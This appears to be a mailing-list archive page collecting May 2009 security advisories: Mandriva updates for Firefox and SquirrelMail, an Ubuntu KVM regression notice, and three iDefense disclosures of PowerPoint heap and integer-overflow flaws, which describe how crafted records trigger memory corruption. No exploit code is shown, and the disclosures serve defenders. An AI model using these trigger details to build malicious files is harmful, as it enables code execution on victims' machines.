[ MDVSA-2009:111 ] firefox
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:111 http://www.mandriva.com/security/ ___ Package : firefox Date: May 12, 2009 Affected: 2009.0, 2009.1 ___ Problem Description: Security vulnerabilities have been discovered in previous versions, and corrected in the latest Mozilla Firefox 3.x, version 3.0.10. (CVE-2009-1302, CVE-2009-1303, CVE-2009-1304, CVE-2009-1305, CVE-2009-0652, CVE-2009-1306, CVE-2009-1307, CVE-2009-1308, CVE-2009-1309, CVE-2009-1310, CVE-2009-1311, CVE-2009-1312, CVE-2009-1313) This update provides the latest Mozilla Firefox 3.x to correct these issues. Additionally, some packages which require so, have been rebuilt and are being provided as updates. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1302 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1303 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1304 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1305 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0652 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1306 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1307 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1308 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1309 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1310 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1311 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1312 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1313 http://www.mozilla.org/security/known-vulnerabilities/firefox30.html#firefox3.0.10 ___ Updated Packages: Mandriva Linux 2009.0: facc21339143c0d8dd8437b24847af45 2009.0/i586/beagle-0.3.8-13.10mdv2009.0.i586.rpm 942eeaa3bf4d919f65edbbefde5334d4 2009.0/i586/beagle-crawl-system-0.3.8-13.10mdv2009.0.i586.rpm 410deb94e79498f0c2a95c0de0661edc 2009.0/i586/beagle-doc-0.3.8-13.10mdv2009.0.i586.rpm 95aae589a2ac5b30633b41e946a0319c 2009.0/i586/beagle-epiphany-0.3.8-13.10mdv2009.0.i586.rpm d99de21d9b4a859c0a7dceb3b5c88fc4 2009.0/i586/beagle-evolution-0.3.8-13.10mdv2009.0.i586.rpm 9208d64884b95450fee03c5bb1353e1f 2009.0/i586/beagle-gui-0.3.8-13.10mdv2009.0.i586.rpm e76e116b639a5d8d929143f0d9abc8b8 2009.0/i586/beagle-gui-qt-0.3.8-13.10mdv2009.0.i586.rpm b3699c915d26a62ccd1766c0c3d117e0 2009.0/i586/beagle-libs-0.3.8-13.10mdv2009.0.i586.rpm dcc119cd178ff2bf112174e4b9fd92d0 2009.0/i586/devhelp-0.21-3.6mdv2009.0.i586.rpm 09940f8d97aaa803bdbfc26d3b77481f 2009.0/i586/devhelp-plugins-0.21-3.6mdv2009.0.i586.rpm db56ccdc69898f1748193b6a243046bf 2009.0/i586/epiphany-2.24.0.1-3.8mdv2009.0.i586.rpm 0a87b80e58653c01eadc9212b6965edb 2009.0/i586/epiphany-devel-2.24.0.1-3.8mdv2009.0.i586.rpm 133ec12c3faad9623674f9acdd58289e 2009.0/i586/firefox-3.0.10-0.1mdv2009.0.i586.rpm 027c01f1287a1de7d70dc06927a36589 2009.0/i586/firefox-ext-beagle-0.3.8-13.10mdv2009.0.i586.rpm 6bf6ddd96696d36e0ad5837ac827701e 2009.0/i586/firefox-ext-mozvoikko-0.9.5-4.6mdv2009.0.i586.rpm c574a4fd14d064e53ee196552a4105d6 2009.0/i586/firefox-theme-kde4ff-0.14-4.6mdv2009.0.i586.rpm 4b162b96b84de3a0906bb626c8c50abe 2009.0/i586/gnome-python-extras-2.19.1-20.6mdv2009.0.i586.rpm 761ae8f0123d9494d0149eb5321d9a8c 2009.0/i586/gnome-python-gda-2.19.1-20.6mdv2009.0.i586.rpm 80f09ec0a289ede7ad097f63d98df29b 2009.0/i586/gnome-python-gda-devel-2.19.1-20.6mdv2009.0.i586.rpm 3b7d4b7be5e106a41a03bb4b9a9b07fb 2009.0/i586/gnome-python-gdl-2.19.1-20.6mdv2009.0.i586.rpm 06527b12f712248fe301f441f4ec6807 2009.0/i586/gnome-python-gtkhtml2-2.19.1-20.6mdv2009.0.i586.rpm ea8747930c63be07918b1f10f466dddf 2009.0/i586/gnome-python-gtkmozembed-2.19.1-20.6mdv2009.0.i586.rpm d00c83e2be9acdbf8ab3bec2051bfc5f 2009.0/i586/gnome-python-gtkspell-2.19.1-20.6mdv2009.0.i586.rpm add78a68e7c055cf64f66d74c6788f26 2009.0/i586/libdevhelp-1_0-0.21-3.6mdv2009.0.i586.rpm 238303c89c07560b4cc51e7225df887b 2009.0/i586/libdevhelp-1-devel-0.21-3.6mdv2009.0.i586.rpm a76fe91a972d1ad60dbcea1c32ea6f87 2009.0/i586/libxulrunner1.9-1.9.0.10-0.1mdv2009.0.i586.rpm 63d7825a827a92913ad18996b72b4b75 2009.0/i586/libxulrunner-devel-1.9.0.10-0.1mdv2009.0.i586.rpm 27a6dd85374223b0156c3aab620276e0 2009.0/i586/libxulrunner-unstable-devel-1.9.0.10-0.1mdv2009.0.i586.rpm cdabb2ed7f1063bafae518c98b89c4ff 2009.0/i586/mozilla-firefox-ext-blogrovr-1.1.779-5.6mdv2009.0.i586.rpm 9239b9f63ca9fe75d134374ef3c4577e 2009.0/i586/mozilla-firefox-ext-foxmarks-2.1.0.12-2.6mdv2009.0.i586.rpm 44fa111d4a99c2441b5ab2a7887b88dc
iDefense Security Advisory 05.12.09: Microsoft PowerPoint Integer Overflow Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 iDefense Security Advisory 05.12.09 http://labs.idefense.com/intelligence/vulnerabilities/ May 12, 2009 I. BACKGROUND Microsoft PowerPoint is an application used for constructing presentations, and comes with the Microsoft Office suite. For more information, see the vendor's site found at the following link. http://office.microsoft.com/en-us/powerpoint/default.aspx II. DESCRIPTION Remote exploitation of an integer overflow vulnerability in Microsoft Corp.'s PowerPoint could allow an attacker to execute arbitrary code with the privileges of the current user. The vulnerability occurs during the parsing of two related PowerPoint record types. The first record type is used to specify collaboration information for different slides. One of the fields in this record contains a 32-bit integer that is used to specify the number of a specific type of records that are present in the file. This integer is used in a multiplication operation that calculates the size of a heap buffer that will be used to store the records as they are read in from the file. The calculation can overflow, resulting in an undersized heap buffer being allocated. By providing a large value for the record count, and inserting enough dummy records, it is possible to trigger a heap based buffer overflow. III. ANALYSIS Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the user opening the file. To exploit this vulnerability, an attacker needs to convince a user to open a malicious file. If the targeted user is running PowerPoint 2000, and the Office Document Open Confirmation Tool is not installed, then it is possible to exploit this vulnerability directly through the browser. Modern versions of Windows (XP, Server 2003, Vista, Server 2008) contain heap allocators with protections against generic heap exploitation techniques. These protections include heap cookies and safe unlinking techniques. However, by default the Office applications use a custom allocator that does not use the normal heap allocator, and does not contain the same level of protection. IV. DETECTION iDefense has confirmed the existence of this vulnerability in the following versions of PowerPoint: PowerPoint 2000 SP3 PowerPoint 2002 (XP) SP2 PowerPoint 2003 SP2 PowerPoint 2003 SP3 PowerPoint 2007, PowerPoint 2007 SP1, and PowerPoint Viewer 2003 are not affected. V. WORKAROUND Since PowerPoint Viewer 2003 is not affected, using it to view untrusted or unexpected PowerPoint files is a valid workaround. VI. VENDOR RESPONSE Microsoft has released a patch which addresses this issue. For more information, consult their advisory at the following URL: http://www.microsoft.com/technet/security/Bulletin/MS09-017.mspx VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2009-0221 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 09/03/2008 - Initial Contact 09/03/2008 - Vendor Acknowledgement 09/04/2008 - PoC Requested 09/09/2008 - PoC Sent 09/17/2008 - PoC Resend Requested 09/17/2008 - PoC Sent 10/01/2008 - Vendor Case Number Issued 12/11/2008 - Vendor Status Update 01/16/2009 - Disclosure Projected 01/20/2009 - Vendor Clarification 02/19/2009 - Vendor Status Update 05/12/2009 - Coordinated Public Disclosure IX. CREDIT This vulnerability was discovered by Sean Larsson, iDefense Labs. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2009 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerserv...@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFKCgKSbjs6HoxIfBkRAlILAKC4DED6VdCInUQPULgvmqQ930igcQCgrHY9 TS1yeuJfa/24dH5iFaGWhpY= =ZXSN -END PGP SIGNATURE-
[ MDVSA-2009:111-1 ] firefox
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:111-1 http://www.mandriva.com/security/ ___ Package : firefox Date: May 13, 2009 Affected: 2009.0 ___ Problem Description: Security vulnerabilities have been discovered in previous versions, and corrected in the latest Mozilla Firefox 3.x, version 3.0.10. (CVE-2009-1302, CVE-2009-1303, CVE-2009-1304, CVE-2009-1305, CVE-2009-0652, CVE-2009-1306, CVE-2009-1307, CVE-2009-1308, CVE-2009-1309, CVE-2009-1310, CVE-2009-1311, CVE-2009-1312, CVE-2009-1313) This update provides the latest Mozilla Firefox 3.x to correct these issues. Additionally, some packages which require so, have been rebuilt and are being provided as updates. Update: The recent Mozilla Firefox update missed the Firefox language packs for Mandriva Linux 2009. This update provides them, fixing the issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1302 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1303 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1304 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1305 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0652 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1306 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1307 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1308 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1309 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1310 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1311 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1312 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1313 http://www.mozilla.org/security/known-vulnerabilities/firefox30.html#firefox3.0.10 ___ Updated Packages: Mandriva Linux 2009.0: 428c63f10fadf9d563ec2842125955eb 2009.0/i586/firefox-af-3.0.10-0.1mdv2009.0.i586.rpm fabdad0d8036a5dc9d8e6cd0d6f587ef 2009.0/i586/firefox-ar-3.0.10-0.1mdv2009.0.i586.rpm 8dba866bf456bf6e8076a2e0fb1e45a2 2009.0/i586/firefox-be-3.0.10-0.1mdv2009.0.i586.rpm 6ee779a9d993a4c04650e0a23d681601 2009.0/i586/firefox-bg-3.0.10-0.1mdv2009.0.i586.rpm c36835a0e2e9ff4e6b43defbeab6f787 2009.0/i586/firefox-bn-3.0.10-0.1mdv2009.0.i586.rpm c440e6dbcf73db73403d08278be48936 2009.0/i586/firefox-ca-3.0.10-0.1mdv2009.0.i586.rpm ac843b5e22e0e29094f3d6d059896850 2009.0/i586/firefox-cs-3.0.10-0.1mdv2009.0.i586.rpm d524e266442215bd69577532b29848dd 2009.0/i586/firefox-cy-3.0.10-0.1mdv2009.0.i586.rpm 2cac493126fc4f6e50de0c9428303aac 2009.0/i586/firefox-da-3.0.10-0.1mdv2009.0.i586.rpm 1c288234043f76e349200d6650afd4a1 2009.0/i586/firefox-de-3.0.10-0.1mdv2009.0.i586.rpm 28a974d0e09b7d6eddecbf6ac7cf3fff 2009.0/i586/firefox-el-3.0.10-0.1mdv2009.0.i586.rpm d2bb49a40f9626fe443ef5f2c73a4063 2009.0/i586/firefox-en_GB-3.0.10-0.1mdv2009.0.i586.rpm 7c94bab7d47bba06200b253408b922ab 2009.0/i586/firefox-eo-3.0.10-0.1mdv2009.0.i586.rpm d98276d0f1a26ee892bd845b9ae66762 2009.0/i586/firefox-es_AR-3.0.10-0.1mdv2009.0.i586.rpm 208435a4d629bee649dc22440a174203 2009.0/i586/firefox-es_ES-3.0.10-0.1mdv2009.0.i586.rpm bac010ff6be1a42cfbef6aff68a8380c 2009.0/i586/firefox-et-3.0.10-0.1mdv2009.0.i586.rpm 319256fe0b2e3fa32fb27b880fd12519 2009.0/i586/firefox-eu-3.0.10-0.1mdv2009.0.i586.rpm 9ac30eebf8c9505ba0c99158e372b303 2009.0/i586/firefox-fi-3.0.10-0.1mdv2009.0.i586.rpm 03560e30d2bd62520cf9665184c37f9d 2009.0/i586/firefox-fr-3.0.10-0.1mdv2009.0.i586.rpm ae16ba2e645c66b80c893fecd5bb0866 2009.0/i586/firefox-fy-3.0.10-0.1mdv2009.0.i586.rpm 849c6cc485543fee318dd00d1e011b96 2009.0/i586/firefox-ga_IE-3.0.10-0.1mdv2009.0.i586.rpm 00c4f1e1c75be22c9749bcb6e19ee1a8 2009.0/i586/firefox-gl-3.0.10-0.1mdv2009.0.i586.rpm 80bb9fe95926ada2c82e50d4247acfff 2009.0/i586/firefox-gu_IN-3.0.10-0.1mdv2009.0.i586.rpm db271c92cbc88a0750b5ab8b4b805c34 2009.0/i586/firefox-he-3.0.10-0.1mdv2009.0.i586.rpm 79ff9ecae9384330c16922406c51ffd6 2009.0/i586/firefox-hi-3.0.10-0.1mdv2009.0.i586.rpm 7e87efe5ddaf54e6966d1886a746dcfe 2009.0/i586/firefox-hu-3.0.10-0.1mdv2009.0.i586.rpm add0fd84eb10233c260950b01a594595 2009.0/i586/firefox-id-3.0.10-0.1mdv2009.0.i586.rpm bc52e2cb6e992d7fb27ac61be4047f35 2009.0/i586/firefox-is-3.0.10-0.1mdv2009.0.i586.rpm 7bb1d34c83b53b4a30dac101bcb7da1c 2009.0/i586/firefox-it-3.0.10-0.1mdv2009.0.i586.rpm 7a159b8384a18577b0ccc3aa0564fe33 2009.0/i586/firefox-ja-3.0.10-0.1mdv2009.0.i586.rpm b67641682152447b0045a977011de2d0 2009.0/i586/firefox-ka-3.0.10-0.1mdv2009.0.i586.rpm 954202831867180681e99be7e9d5cbca
iDefense Security Advisory 05.12.09: Microsoft PowerPoint Build List Memory Corruption Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 iDefense Security Advisory 05.12.09 http://labs.idefense.com/intelligence/vulnerabilities/ May 12, 2009 I. BACKGROUND Microsoft PowerPoint is an application used for constructing presentations, and comes with the Microsoft Office suite. For more information, see the vendor's site found at the following link. http://office.microsoft.com/en-us/powerpoint/default.aspx II. DESCRIPTION Remote exploitation of a memory corruption vulnerability in Microsoft Corp.'s PowerPoint could allow an attacker to execute arbitrary code with the privileges of the current user. The vulnerability occurs during the parsing of the BuildList record. This record is a container for other records that describe charts and diagrams in the PowerPoint file. By inserting multiple BuildList records with ChartBuild containers inside of them, it is possible to trigger a memory corruption vulnerability during the parsing of the ChartBuild container's contents. This allows an attacker to control an object pointer, which can lead to attacker supplied function pointers being dereferenced. III. ANALYSIS Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the user opening the file. To exploit this vulnerability, an attacker needs to convince a user to open a malicious file. If the targeted user is running PowerPoint 2000, and the Office Document Open Confirmation Tool is not installed, then it is possible to exploit this vulnerability directly through the browser. Due to the nature of the vulnerability, relatively precise control of the process memory layout is needed to successfully exploit this vulnerability. iDefense Labs has developed exploit code that successfully exploits this vulnerability. IV. DETECTION iDefense has confirmed the existence of this vulnerability in the following versions of PowerPoint: PowerPoint 2000 SP3 PowerPoint 2002 (XP) SP3 PowerPoint 2003 SP2 PowerPoint 2003 SP3 PowerPoint 2007 PowerPoint 2007 SP1 PowerPoint Viewer 2003 V. WORKAROUND Use Microsoft's moice tool to convert files to the new XML format. VI. VENDOR RESPONSE Microsoft has released a patch which addresses this issue. For more information, consult their advisory at the following URL: http://www.microsoft.com/technet/security/Bulletin/MS09-017.mspx VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2009-0224 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 10/06/2008 - Initial Contact 10/06/2008 - Initial Response 10/06/2008 - Researcher sent Inquiry to Vendor 10/07/2008 - Case number assigned 10/07/2008 - Initial resposne to Researcher Inquiry 12/12/2008 - Status Update Received - estimated release date 03/10/2009 02/24/2009 - Researcher restates Inquiry to Vendor 02/24/2009 - Status Update Received - estimated release date 06/09/2009 02/24/2009 - Vendor provides response to Inquiry 05/12/2009 - Coordinated Public Disclosure IX. CREDIT This vulnerability was discovered by Sean Larsson, iDefense Labs. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2009 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerserv...@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFKCfsSbjs6HoxIfBkRAowbAJ9zDkOUM15X5jJ9v6XEqkIzy2qmkwCfVMWU 0hS8cKkE4awCn4LhwK99Es4= =gpZa -END PGP SIGNATURE-
[ MDVSA-2009:110 ] squirrelmail
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:110 http://www.mandriva.com/security/ ___ Package : squirrelmail Date: May 12, 2009 Affected: Corporate 4.0 ___ Problem Description: Multiple vulnerabilities has been identified and corrected in squirrelmail: Two issues were fixed that both allowed an attacker to run arbitrary script (XSS) on most any SquirrelMail page by getting the user to click on specially crafted SquirrelMail links (CVE-2009-1578). An issue was fixed wherein input to the contrib/decrypt_headers.php script was not sanitized and allowed arbitrary script execution upon submission of certain values (CVE-2009-1578). An issue was fixed that allowed arbitrary server-side code execution when SquirrelMail was configured to use the example map_yp_alias username mapping functionality (CVE-2009-1579). An issue was fixed that allowed an attacker to possibly steal user data by hijacking the SquirrelMail login session. (CVE-2009-1580). An issue was fixed that allowed phishing and cross-site scripting (XSS) attacks to be run by surreptitious placement of content in specially-crafted emails sent to SquirrelMail users (CVE-2009-1581). Additionally many of the bundled plugins has been upgraded. Basically this is a syncronization with the latest squirrelmail package found in Mandriva Cooker. The rpm changelog will reveal all the changes (rpm -q --changelog squirrelmail). The updated packages have been upgraded to the latest version of squirrelmail to prevent this. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1578 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1579 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1580 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1581 ___ Updated Packages: Corporate 4.0: d8e8e8560b8b5cf89bb06dbda75033ef corporate/4.0/i586/squirrelmail-1.4.18-0.1.20060mlcs4.noarch.rpm 0ba6c8b99d8ccac0df0d3e90a7d70f47 corporate/4.0/i586/squirrelmail-ar-1.4.18-0.1.20060mlcs4.noarch.rpm 54b0bb74cba4da1dffdf0dc044de0986 corporate/4.0/i586/squirrelmail-bg-1.4.18-0.1.20060mlcs4.noarch.rpm fe1cfa4f6317fd8e295e0265be5da46b corporate/4.0/i586/squirrelmail-bn-1.4.18-0.1.20060mlcs4.noarch.rpm 46835353a19ca7e290ee0f538dc1cfec corporate/4.0/i586/squirrelmail-ca-1.4.18-0.1.20060mlcs4.noarch.rpm 786fcdba5121c48523b856cf3ff2c7a2 corporate/4.0/i586/squirrelmail-cs-1.4.18-0.1.20060mlcs4.noarch.rpm a792847e8d14f3249700e6779d2abbf1 corporate/4.0/i586/squirrelmail-cy-1.4.18-0.1.20060mlcs4.noarch.rpm b539efa2ba48b7b20f7c5e095fd43286 corporate/4.0/i586/squirrelmail-cyrus-1.4.18-0.1.20060mlcs4.noarch.rpm a57030df0e927b18ff0d40d745400cec corporate/4.0/i586/squirrelmail-da-1.4.18-0.1.20060mlcs4.noarch.rpm 3d97a69708fef53af1c525c39c093b07 corporate/4.0/i586/squirrelmail-de-1.4.18-0.1.20060mlcs4.noarch.rpm 98441c32e477f087e78782a37e15ff4c corporate/4.0/i586/squirrelmail-el-1.4.18-0.1.20060mlcs4.noarch.rpm 98b2e8b09c82a5ebc00047683bc6b20b corporate/4.0/i586/squirrelmail-en-1.4.18-0.1.20060mlcs4.noarch.rpm af04c8fd5c883b91959969d29c3af0cb corporate/4.0/i586/squirrelmail-es-1.4.18-0.1.20060mlcs4.noarch.rpm 7e2d7a7bbab015d551b058352b21162c corporate/4.0/i586/squirrelmail-et-1.4.18-0.1.20060mlcs4.noarch.rpm e3b34eb6311c4ee45b3e39285cc547f4 corporate/4.0/i586/squirrelmail-eu-1.4.18-0.1.20060mlcs4.noarch.rpm 8f4b2e47224cd83b244745b11f7cda9f corporate/4.0/i586/squirrelmail-fa-1.4.18-0.1.20060mlcs4.noarch.rpm fa7b77a672e5afa5e09b771d1ead14ff corporate/4.0/i586/squirrelmail-fi-1.4.18-0.1.20060mlcs4.noarch.rpm cb03089c1d10100f95b51e9345cc276b corporate/4.0/i586/squirrelmail-fo-1.4.18-0.1.20060mlcs4.noarch.rpm bb4bbb512b376271caff2ab4677a47e9 corporate/4.0/i586/squirrelmail-fr-1.4.18-0.1.20060mlcs4.noarch.rpm 2dcc5aee1f396884ea1f74c22b12c33a corporate/4.0/i586/squirrelmail-fy-1.4.18-0.1.20060mlcs4.noarch.rpm b87f520a511a53315ac9e1d594b7e3b9 corporate/4.0/i586/squirrelmail-he-1.4.18-0.1.20060mlcs4.noarch.rpm 4fdce8e38907de080ed1e1b76ef1d738 corporate/4.0/i586/squirrelmail-hr-1.4.18-0.1.20060mlcs4.noarch.rpm 0033224ec4127bd3768ec8b04b8de062 corporate/4.0/i586/squirrelmail-hu-1.4.18-0.1.20060mlcs4.noarch.rpm 18abc4c3cef94dc46cf26f33c3810e01 corporate/4.0/i586/squirrelmail-id-1.4.18-0.1.20060mlcs4.noarch.rpm 53c1d4d450cfa0c73e146aadf151d98b corporate/4.0/i586/squirrelmail-is-1.4.18-0.1.20060mlcs4.noarch.rpm aff35aa1c9e1e1e5be59b51b24ed1dbd corporate/4.0/i586/squirrelmail-it-1.4.18-0.1.20060mlcs4.noarch.rpm c1b86cbcf1f7060fa760f58cd10862b6
[USN-776-2] KVM regression
=== Ubuntu Security Notice USN-776-2 May 13, 2009 kvm regression https://launchpad.net/bugs/375937 === A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: kvm 1:62+dfsg-0ubuntu8.2 After a standard system upgrade you need to restart all KVM VMs to effect the necessary changes. Details follow: USN-776-1 fixed vulnerabilities in KVM. Due to an incorrect fix, a regression was introduced in Ubuntu 8.04 LTS that caused KVM to fail to boot virtual machines started via libvirt. This update fixes the problem. We apologize for the inconvenience. Original advisory details: Avi Kivity discovered that KVM did not correctly handle certain disk formats. A local attacker could attach a malicious partition that would allow the guest VM to read files on the VM host. (CVE-2008-1945, CVE-2008-2004) Alfredo Ortega discovered that KVM's VNC protocol handler did not correctly validate certain messages. A remote attacker could send specially crafted VNC messages that would cause KVM to consume CPU resources, leading to a denial of service. (CVE-2008-2382) Jan Niehusmann discovered that KVM's Cirrus VGA implementation over VNC did not correctly handle certain bitblt operations. A local attacker could exploit this flaw to potentially execute arbitrary code on the VM host or crash KVM, leading to a denial of service. (CVE-2008-4539) It was discovered that KVM's VNC password checks did not use the correct length. A remote attacker could exploit this flaw to cause KVM to crash, leading to a denial of service. (CVE-2008-5714) Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/k/kvm/kvm_62+dfsg-0ubuntu8.2.diff.gz Size/MD5:43096 333b89921844b52e00b05172a49728e3 http://security.ubuntu.com/ubuntu/pool/main/k/kvm/kvm_62+dfsg-0ubuntu8.2.dsc Size/MD5: 1044 25c3b0f1abb252aeb6135f5dd8782b8e http://security.ubuntu.com/ubuntu/pool/main/k/kvm/kvm_62+dfsg.orig.tar.gz Size/MD5: 3117412 b992a0ff585020cd5f586ac8046ad335 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/k/kvm/kvm-source_62+dfsg-0ubuntu8.2_all.deb Size/MD5: 146586 020e3cf65f1e6ef6051aaf2b85bdfff8 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/k/kvm/kvm_62+dfsg-0ubuntu8.2_amd64.deb Size/MD5: 770350 af69aba1e0a6ecd885ed13be5ddb32c1 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/k/kvm/kvm_62+dfsg-0ubuntu8.2_i386.deb Size/MD5: 709496 be95457ef9553f5197f8a23a67c4b713 signature.asc Description: This is a digitally signed message part
iDefense Security Advisory 05.12.09: Microsoft PowerPoint Notes Container Heap Corruption Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 iDefense Security Advisory 05.12.09 http://labs.idefense.com/intelligence/vulnerabilities/ May 12, 2009 I. BACKGROUND Microsoft PowerPoint is an application used for constructing presentations, and comes with the Microsoft Office suite. For more information, see the vendor's site found at the following link. http://office.microsoft.com/en-us/powerpoint/default.aspx II. DESCRIPTION Remote exploitation of a heap corruption vulnerability in Microsoft Corp.'s PowerPoint could allow an attacker to execute arbitrary code with the privileges of the current user. The vulnerability occurs when parsing the Notes container inside of the PowerPoint Document stream. This container is used to hold records related to notes that appear on the slides. By inserting a value into a container, it is possible to trigger a memory corruption vulnerability. III. ANALYSIS Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the user opening the file. To exploit this vulnerability, an attacker needs to convince a user to open a malicious file. If the targeted user is running PowerPoint 2000, and the Office Document Open Confirmation Tool is not installed, then it is possible to exploit this vulnerability directly through the browser. Due to the nature of the vulnerability, relatively precise control of the process memory layout is needed to successfully exploit this vulnerability. iDefense Labs has developed exploit code that successfully exploits this vulnerability. IV. DETECTION iDefense has confirmed the existence of this vulnerability in the following versions of PowerPoint: PowerPoint 2000 SP3 PowerPoint 2002 (XP) SP3 PowerPoint 2003 SP2 PowerPoint 2003 SP3 PowerPoint 2007, PowerPoint 2007 SP1, and PowerPoint Viewer 2003 are not affected. V. WORKAROUND Since PowerPoint Viewer 2003 is not affected, using it to view untrusted or unexpected PowerPoint files is a valid workaround. VI. VENDOR RESPONSE Microsoft has released a patch which addresses this issue. For more information, consult their advisory at the following URL: http://www.microsoft.com/technet/security/Bulletin/MS09-017.mspx VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2009-1130 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 10/22/2008 - Initial Contact 10/22/2008 - Initial Vendor Response 10/22/2008 - PoC Requested 11/05/2008 - PoC Sent 11/05/2008 - Vendor Case Number Assigned 11/07/2008 - Vendor Status Update 02/19/2009 - Vendor Status Update 05/12/2009 - Coordinated Public Disclosure IX. CREDIT This vulnerability was discovered by Sean Larsson, iDefense Labs. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2009 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerserv...@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFKCgAEbjs6HoxIfBkRAvFeAKCB8mOVbEfFLi4XHc/a88DCfYk+IgCgxYng GerX8gc4MBh5dhd8o2tXDVQ= =vk19 -END PGP SIGNATURE-
Re: FormMail 1.92 Multiple Vulnerabilities
